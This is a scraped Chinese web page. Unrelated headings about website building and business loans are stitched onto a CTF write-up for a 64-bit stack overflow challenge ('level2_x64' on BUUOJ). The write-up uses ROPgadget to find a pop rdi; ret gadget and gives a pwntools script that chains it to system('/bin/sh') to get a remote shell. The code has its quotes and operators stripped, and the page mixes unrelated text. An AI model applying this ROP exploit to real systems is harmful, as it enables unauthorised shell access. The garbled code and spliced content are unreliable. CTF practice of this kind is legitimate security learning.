建设网站时 首先要解决两个问题 一是什么深圳企业贷款
2026/2/17 7:22:40
百润网站建设如何自建网站入口
百润网站建设,如何自建网站入口,公司简介怎么写 范文,wordpress 伪静态 主题失效步骤使用checksec查看使用ida(pro)打开根进vulnerable_function函数依旧是栈溢出这道题我们无法使用上一题的32位来直接使用plt表来跳转到system,所以我们使用ROPgadget使用指令 ROPgadget --binary 文件名 来获取信息这里可以查看到pop rdi;ret的地址在64位中前几个参数我们是…步骤使用checksec查看使用ida(pro)打开根进vulnerable_function函数依旧是栈溢出这道题我们无法使用上一题的32位来直接使用plt表来跳转到system,所以我们使用ROPgadget使用指令 ROPgadget --binary 文件名 来获取信息这里可以查看到pop rdi;ret的地址在64位中前几个参数我们是使用寄存器来存储的,后续的存放下栈中与32位直接存放在栈中不同,在此处我们需要向rdi寄存器中存入我们的后门函数地址我们通过pop rdi;ret来将/bin/sh地址存入rdi寄存器,并且调用system函数/bin/sh地址system地址expfrom pwn import * #pprocess(./level2_x64) premote(node5.buuoj.cn,29996) pop_rdi_ret_addr 0x4006b3 bin_sh_addr 0x600A90 system_addr 0x40063E pay ba*(0x808) p64(pop_rdi_ret_addr) p64(bin_sh_addr) p64(system_addr) p.sendlineafter(bInput,pay) p.interactive()